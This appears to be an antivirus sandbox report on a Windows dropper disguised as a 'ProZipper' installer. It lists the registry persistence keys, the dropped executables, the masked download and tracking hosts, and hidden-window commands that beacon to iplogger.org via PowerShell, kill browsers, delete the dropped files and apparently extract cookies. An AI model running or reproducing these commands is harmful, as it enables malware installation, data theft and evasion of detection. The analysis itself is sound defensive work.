Technical Information
To ensure autorun and distribution
Modifies the following registry keys
- [<HKLM>\Software\Microsoft\Windows\CurrentVersion\RunOnce] 'system recover' = '"%ProgramFiles(x86)%\Uninstall Information\Saemenawusu.exe"'
- [<HKLM>\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run] 'kissq' = '%TEMP%\kissq.exe'
Malicious functions
Executes the following
- '%ProgramFiles(x86)%\internet explorer\iexplore.exe' http://www.on####kbright.com/jump/next.php?r=################
Modifies file system
Creates the following files
- %TEMP%\is-5b34f.tmp\<File name>.tmp
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\2ccplbov\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\sx0apsbm\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\index.dat
- %LOCALAPPDATA%\microsoft\windows\history\low\history.ie5\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\history\low\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\i44ji54g\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\desktop.ini
- %TEMP%\rb5uqt4h.a3l\app.exe
- %APPDATA%\mozilla\firefox\profiles\gn7ryp~1.def\cookies.sqlite-shm
- %LOCALAPPDATA%\google\chrome\userda~1\default\login data.bak
- %TEMP%\55n2wzpi.kj0\logo.gif
- %TEMP%\55n2wzpi.kj0\config.ini
- %TEMP%\gwug4qlg.j5s\wyfdggff.exe
- %TEMP%\3cscchm4.3gi\microsoft.cp.chromec.unit.exe
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\mg5eskrv\desktop.ini
- %APPDATA%\microsoft\windows\cookies\low\index.dat
- %LOCALAPPDATA%\microsoft\windows\history\low\history.ie5\index.dat
- %TEMP%\1445612.exe
- nul
- %TEMP%\3kioga4u.xar\spedupww3.exe
- %TEMP%\es3py3cz.vty\searzar_9.exe
- %TEMP%\gwug4qlg.j5s\d-shm
- %TEMP%\gwug4qlg.j5s\d
- %LOCALAPPDATA%\installer.dat
- %LOCALAPPDATA%\installationconfiguration.xml
- %TEMP%\3bjir1nb.54a\driverbridge.exe
- %TEMP%\dklxaloz.eyz\setup.exe
- %TEMP%\kissq.exe
- %TEMP%\cufovno5.fps\jhuuee.exe
- %TEMP%\rahy0o15.bxb\fish.exe
- %TEMP%\fjgha23_fa.txt
- %TEMP%\jfiag_gg.exe
- %TEMP%\mxnwbj0z.bwb\videoplay_8.exe
- %TEMP%\nsm751.tmp\ctcb5gbdep.dll
- %TEMP%\epni52br.em3\ufgaa.exe
- %TEMP%\nsf5268.tmp\mmtkj0hmp3wu.dll
- %TEMP%\d2-1ad8b-de0-90292-e8447c8be96ce\raeqoshizhigae.exe
- %ProgramFiles(x86)%\uninstall information\saemenawusu.exe.config
- %ProgramFiles(x86)%\uninstall information\saemenawusu.exe
- %TEMP%\9f-d562d-c1b-26eb2-21de189b2b5fe\wicopateby.exe.config
- %TEMP%\9f-d562d-c1b-26eb2-21de189b2b5fe\wicopateby.exe
- %TEMP%\is-0o7na.tmp\prozipper.tmp
- %TEMP%\d2-1ad8b-de0-90292-e8447c8be96ce\raeqoshizhigae.exe.config
- %TEMP%\9f-d562d-c1b-26eb2-21de189b2b5fe\kenessey.txt
- %ProgramFiles%\maplestory\hhgxwzvhij\prozipper.exe
- %TEMP%\is-ajs5t.tmp\prozipperred.exe
- %TEMP%\is-ajs5t.tmp\prozipperred.exe.config
- %TEMP%\is-ajs5t.tmp\itdownload.dll
- %TEMP%\is-ajs5t.tmp\_isetup\_shfoldr.dll
- %TEMP%\is-ajs5t.tmp\_isetup\_setup64.tmp
- %ProgramFiles%\maplestory\hhgxwzvhij\prozipper.exe.config
- %TEMP%\97-7d4d9-78f-cfba4-cde95aa35a0ef\kenessey.txt
- %TEMP%\97-7d4d9-78f-cfba4-cde95aa35a0ef\vawihewoca.exe
- %TEMP%\97-7d4d9-78f-cfba4-cde95aa35a0ef\vawihewoca.exe.config
- %TEMP%\4.exe
- %TEMP%\3.exe
- %TEMP%\2.exe
- %TEMP%\1.exe
- %TEMP%\gvsxcjew.4qe\e2ob.exe
- %TEMP%\55n2wzpi.kj0\id12.exe
- %TEMP%\cfoi1c40.rgt\speadup3.exe
- %ProgramFiles(x86)%\prozipper\unins000.dat
- C:\users\public\desktop\prozipper.lnk
- %PROGRAMDATA%\microsoft\windows\start menu\programs\prozipper.lnk
- %ProgramFiles(x86)%\prozipper\is-i9887.tmp
- %ProgramFiles(x86)%\prozipper\is-982l5.tmp
- %ProgramFiles(x86)%\prozipper\is-ej7k0.tmp
- %TEMP%\is-6dapd.tmp\_isetup\_shfoldr.dll
- %TEMP%\is-6dapd.tmp\_isetup\_setup64.tmp
- %TEMP%\k0cckkqr.uff\videoplay.exe
- %TEMP%\ywi34tnr.pf4\y4.exe
Sets the 'hidden' attribute to the following files
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\sx0apsbm\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\2ccplbov\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\i44ji54g\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\low\content.ie5\mg5eskrv\desktop.ini
- %LOCALAPPDATA%\microsoft\windows\history\low\history.ie5\desktop.ini
Deletes the following files
- %TEMP%\is-ajs5t.tmp\itdownload.dll
- %TEMP%\is-ajs5t.tmp\prozipperred.exe
- %TEMP%\is-ajs5t.tmp\prozipperred.exe.config
- %TEMP%\is-ajs5t.tmp\_isetup\_setup64.tmp
- %TEMP%\is-ajs5t.tmp\_isetup\_shfoldr.dll
- %TEMP%\is-5b34f.tmp\<File name>.tmp
- %TEMP%\gwug4qlg.j5s\d
- %TEMP%\gwug4qlg.j5s\d-shm
- %TEMP%\3bjir1nb.54a\driverbridge.exe
Moves the following files
- from %ProgramFiles(x86)%\prozipper\is-ej7k0.tmp to %ProgramFiles(x86)%\prozipper\unins000.exe
- from %ProgramFiles(x86)%\prozipper\is-982l5.tmp to %ProgramFiles(x86)%\prozipper\prozipper.exe
- from %ProgramFiles(x86)%\prozipper\is-i9887.tmp to %ProgramFiles(x86)%\prozipper\dotnetzip.dll
Substitutes the following files
- %TEMP%\gwug4qlg.j5s\d
Network activity
TCP
HTTP GET requests
- http://pr#######.#3.eu-central-1.amazonaws.com/prozipperRed.exe
- http://lo#####ghtin20days.site/spedupww3.exe
- http://www.se###arinfo.com/szzar.exe
- http://www.se###arinfo.com/yjynczc/searzar_9.exe
- http://10#.#24.106.34/download_for_ben0625/setup.exe
- http://jo####.jfoaigh.com/uue/jhuuee.exe
- http://h8#####2.ssl.hwcdn.net/APSFADexpNR/dynlink_1593253020059.exe
- http://in#####.portmdfmoon.com/download/APSFADexpNR
- http://ip##pi.com/json/
- http://www.ki###cture.pw/pit/wyfdggff.exe
- http://www.ge####dvideo.com/vdp1058/videoplay_8.exe
- http://jo####.jfoaigh.com/iuww/jvppp.exe
- http://www.ge####dvideo.com/video.exe
- http://www.ge####dvideo.com/vdp1051/videoplay.exe
- http://lo####cebook.info/promo/lload/id43873842944/hz3lnk.exe
- http://lo#####ghtin20days.site/speadupeu3.exe
- http://at#####kyday0003.top/down/id12.exe
- http://www.on####kbright.com/jump/next.php?r=################
- http://pr#####sdetails.online/Series/configPoduct/3/normale.json
- http://pr#####sdetails.online/Series/configPoduct/1/saleschannel1.json
- http://pr#####sdetails.online/Series/kenpachi/1/saleschannel1/NL.json
- http://pr#####sdetails.online/Series/kenpachi/3/normale/TN.json
- http://pr#####sdetails.online/Series/publisher//2/TN.json
- http://www.google.com/
- http://www.wf###wedfs.com/index.php/api/fb?da####################################################################################################################################################...
- http://y1#####0c29fcfe249.xyz/y4.exe
HTTP POST requests
- http://pr#####sdetails.online/Series/Conumer1PirloS2S.php
- http://pr#####sdetails.online/Series/Conumer4Publisher.php
- http://pr#####sdetails.online/Series/Conumer2kenpachi.php
- http://fr####video.cloud/business/receive
- http://po####ack-url.com/temptrack/Store
UDP
- DNS ASK pr#######.#3.eu-central-1.amazonaws.com
- DNS ASK fa###ook.com
- DNS ASK se###arinfo.com
- DNS ASK h8#####2.ssl.hwcdn.net
- DNS ASK in#####.portmdfmoon.com
- DNS ASK yi#.su
- DNS ASK ip##pi.com
- DNS ASK 2x###z5e3s.com
- DNS ASK fr####video.cloud
- DNS ASK or####rygame.site
- DNS ASK sa###ooks.xyz
- DNS ASK ki###cture.pw
- DNS ASK wf###wedfs.com
- DNS ASK jo####.jfoaigh.com
- DNS ASK ht####ownload.pw
- DNS ASK lo####cebook.info
- DNS ASK lo#####ghtin20days.site
- DNS ASK at#####kyday0003.top
- DNS ASK on####kbright.com
- DNS ASK pr###ipper.com
- DNS ASK google.com
- DNS ASK ip###ger.org
- DNS ASK po####ack-url.com
- DNS ASK sy#####.##.eu-central-1.amazonaws.com
- DNS ASK pr#####sdetails.online
- DNS ASK ge####dvideo.com
- DNS ASK y1#####0c29fcfe249.xyz
Miscellaneous
Searches for the following windows
- ClassName: 'DDEMLMom' WindowName: ''
- ClassName: 'IEFrame' WindowName: ''
- ClassName: 'Static' WindowName: ''
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
Creates and executes the following
- '%TEMP%\is-5b34f.tmp\<File name>.tmp' /SL5="$90224,296599,214528,<Full path to file>"
- '%TEMP%\es3py3cz.vty\searzar_9.exe'
- '%TEMP%\1445612.exe'
- '%TEMP%\k0cckkqr.uff\videoplay.exe' /S /uid=1051
- '%TEMP%\55n2wzpi.kj0\id12.exe'
- '%TEMP%\epni52br.em3\ufgaa.exe'
- '%TEMP%\jfiag_gg.exe' /scookiestxt %TEMP%\fjgha23_fa.txt
- '%TEMP%\mxnwbj0z.bwb\videoplay_8.exe' /cid=1058
- '%TEMP%\gwug4qlg.j5s\wyfdggff.exe'
- '%TEMP%\3bjir1nb.54a\driverbridge.exe'
- '%TEMP%\rb5uqt4h.a3l\app.exe' /7-460
- '%TEMP%\3cscchm4.3gi\microsoft.cp.chromec.unit.exe'
- '%TEMP%\3.exe'
- '%TEMP%\rahy0o15.bxb\fish.exe' {"packer":{"DistributerName":"APSFADexpNR","ChannelId":"3"},"Agent":{"SetAll":"true","campaignId":"461"}}
- '%TEMP%\3kioga4u.xar\spedupww3.exe' /VERYSILENT
- '%TEMP%\4.exe'
- '%TEMP%\cfoi1c40.rgt\speadup3.exe' /VERYSILENT
- '%TEMP%\cufovno5.fps\jhuuee.exe' times21
- '%ProgramFiles(x86)%\prozipper\prozipper.exe' -silent -desktopShortcut -programMenu
- '%TEMP%\ywi34tnr.pf4\y4.exe'
- '%TEMP%\97-7d4d9-78f-cfba4-cde95aa35a0ef\vawihewoca.exe' /noat
- '%TEMP%\2.exe'
- '%TEMP%\gvsxcjew.4qe\e2ob.exe' /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP-
- '%TEMP%\d2-1ad8b-de0-90292-e8447c8be96ce\raeqoshizhigae.exe' /static
- '%TEMP%\9f-d562d-c1b-26eb2-21de189b2b5fe\wicopateby.exe'
- '%ProgramFiles%\maplestory\hhgxwzvhij\prozipper.exe' /VERYSILENT
- '%TEMP%\is-ajs5t.tmp\prozipperred.exe' /S /UID=4500
- '%TEMP%\1.exe'
- '%TEMP%\is-0o7na.tmp\prozipper.tmp' /SL5="$B0210,690376,247808,%ProgramFiles%\maplestory\HHGXWZVHIJ\ProZipper.exe" /VERYSILENT
- '<SYSTEM32>\cmd.exe' /k %TEMP%\rahy0o15.bxb\fish.exe {"packer":{"DistributerName":"APSFADexpNR","ChannelId":"3"},"Agent":{"SetAll":"true","campaignId":"461"}} & exit' (with hidden window)
- '<SYSTEM32>\cmd.exe' /k %TEMP%\cufovno5.fps\jhuuee.exe times21 & exit' (with hidden window)
- '<SYSTEM32>\cmd.exe' /k %TEMP%\3kioga4u.xar\spedupww3.exe /VERYSILENT & exit' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c start "" "1445612.exe" & start "" "4.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1oKqQ"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /k %TEMP%\es3py3cz.vty\searzar_9.exe & exit' (with hidden window)
- '<SYSTEM32>\cmd.exe' /k %TEMP%\dklxaloz.eyz\setup.exe & exit' (with hidden window)
- '<SYSTEM32>\cmd.exe' /k %TEMP%\3bjir1nb.54a\driverbridge.exe & exit' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c ping 127.0.0.1 -n 3 & del "%TEMP%\ywi34tnr.pf4\y4.exe"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /k %TEMP%\gwug4qlg.j5s\wyfdggff.exe & exit' (with hidden window)
- '%TEMP%\jfiag_gg.exe' /scookiestxt %TEMP%\fjgha23_fa.txt' (with hidden window)
- '<SYSTEM32>\cmd.exe' /k %TEMP%\gvsxcjew.4qe\e2ob.exe /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP- & exit' (with hidden window)
- '<SYSTEM32>\cmd.exe' /k %TEMP%\rb5uqt4h.a3l\app.exe /7-460 & exit' (with hidden window)
- '<SYSTEM32>\cmd.exe' /k %TEMP%\mxnwbj0z.bwb\videoplay_8.exe /cid=1058 & exit' (with hidden window)
- '<SYSTEM32>\cmd.exe' /k %TEMP%\epni52br.em3\ufgaa.exe & exit' (with hidden window)
- '<SYSTEM32>\cmd.exe' /k %TEMP%\55n2wzpi.kj0\id12.exe & exit' (with hidden window)
- '<SYSTEM32>\cmd.exe' /k %TEMP%\k0cckkqr.uff\videoplay.exe /S /uid=1051 & exit' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c start "" "1.exe" & start "" "2.exe" & start "" "3.exe" & start "" "4.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1lxgd"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /k %TEMP%\cfoi1c40.rgt\speadup3.exe /VERYSILENT & exit' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /f /im chrome.exe' (with hidden window)
- '%TEMP%\is-ajs5t.tmp\prozipperred.exe' /S /UID=4500' (with hidden window)
- '<SYSTEM32>\cmd.exe' /k %TEMP%\3cscchm4.3gi\Microsoft.cp.chromec.unit.exe & exit' (with hidden window)
- '<SYSTEM32>\cmd.exe' /k %TEMP%\ywi34tnr.pf4\y4.exe & exit' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /f /im opera.exe' (with hidden window)
Executes the following
- '<SYSTEM32>\cmd.exe' /k %TEMP%\cfoi1c40.rgt\speadup3.exe /VERYSILENT & exit
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /f /im chrome.exe
- '%WINDIR%\syswow64\cmd.exe' /c ping 127.0.0.1 -n 3 & del "%TEMP%\ywi34tnr.pf4\y4.exe"
- '%WINDIR%\syswow64\rundll32.exe' 003 install4
- '%WINDIR%\syswow64\rundll32.exe' 002 install4
- '%WINDIR%\syswow64\rundll32.exe' 001 install4 1
- '<SYSTEM32>\cmd.exe' /k %TEMP%\dklxaloz.eyz\setup.exe & exit
- '<SYSTEM32>\cmd.exe' /k %TEMP%\ywi34tnr.pf4\y4.exe & exit
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command "Invoke-WebRequest -Uri https://iplogger.org/1oKqQ"
- '%WINDIR%\syswow64\cmd.exe' /c start "" "1445612.exe" & start "" "4.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1oKqQ"
- '<SYSTEM32>\cmd.exe' /k %TEMP%\3kioga4u.xar\spedupww3.exe /VERYSILENT & exit
- '%WINDIR%\syswow64\ping.exe' 1.1.1.1 -n 1 -w 3000
- '%WINDIR%\syswow64\cmd.exe' /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "%TEMP%\3bjir1nb.54a\driverbridge.exe"
- '<SYSTEM32>\cmd.exe' /k %TEMP%\es3py3cz.vty\searzar_9.exe & exit
- '<SYSTEM32>\cmd.exe' /k %TEMP%\3bjir1nb.54a\driverbridge.exe & exit
- '<SYSTEM32>\cmd.exe' /k %TEMP%\rahy0o15.bxb\fish.exe {"packer":{"DistributerName":"APSFADexpNR","ChannelId":"3"},"Agent":{"SetAll":"true","campaignId":"461"}} & exit
- '<SYSTEM32>\cmd.exe' /k %TEMP%\cufovno5.fps\jhuuee.exe times21 & exit
- '<SYSTEM32>\cmd.exe' /k %TEMP%\3cscchm4.3gi\Microsoft.cp.chromec.unit.exe & exit
- '<SYSTEM32>\cmd.exe' /k %TEMP%\rb5uqt4h.a3l\app.exe /7-460 & exit
- '%WINDIR%\syswow64\rundll32.exe' "%WINDIR%\syswow64\WININET.dll",DispatchAPICall 1
- '<SYSTEM32>\cmd.exe' /k %TEMP%\gwug4qlg.j5s\wyfdggff.exe & exit
- '<SYSTEM32>\cmd.exe' /k %TEMP%\mxnwbj0z.bwb\videoplay_8.exe /cid=1058 & exit
- '<SYSTEM32>\cmd.exe' /k %TEMP%\epni52br.em3\ufgaa.exe & exit
- '<SYSTEM32>\cmd.exe' /k %TEMP%\55n2wzpi.kj0\id12.exe & exit
- '<SYSTEM32>\cmd.exe' /k %TEMP%\k0cckkqr.uff\videoplay.exe /S /uid=1051 & exit
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command "Invoke-WebRequest -Uri https://iplogger.org/1lxgd"
- '<SYSTEM32>\cmd.exe' /k %TEMP%\gvsxcjew.4qe\e2ob.exe /VERYSILENT /SUPPRESSMSGBOXES /NORESTART /SP- & exit
- '%WINDIR%\syswow64\cmd.exe' /c start "" "1.exe" & start "" "2.exe" & start "" "3.exe" & start "" "4.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1lxgd"
- '%WINDIR%\microsoft.net\framework\v4.0.30319\regasm.exe'
- '%WINDIR%\syswow64\cmd.exe' /c taskkill /f /im opera.exe
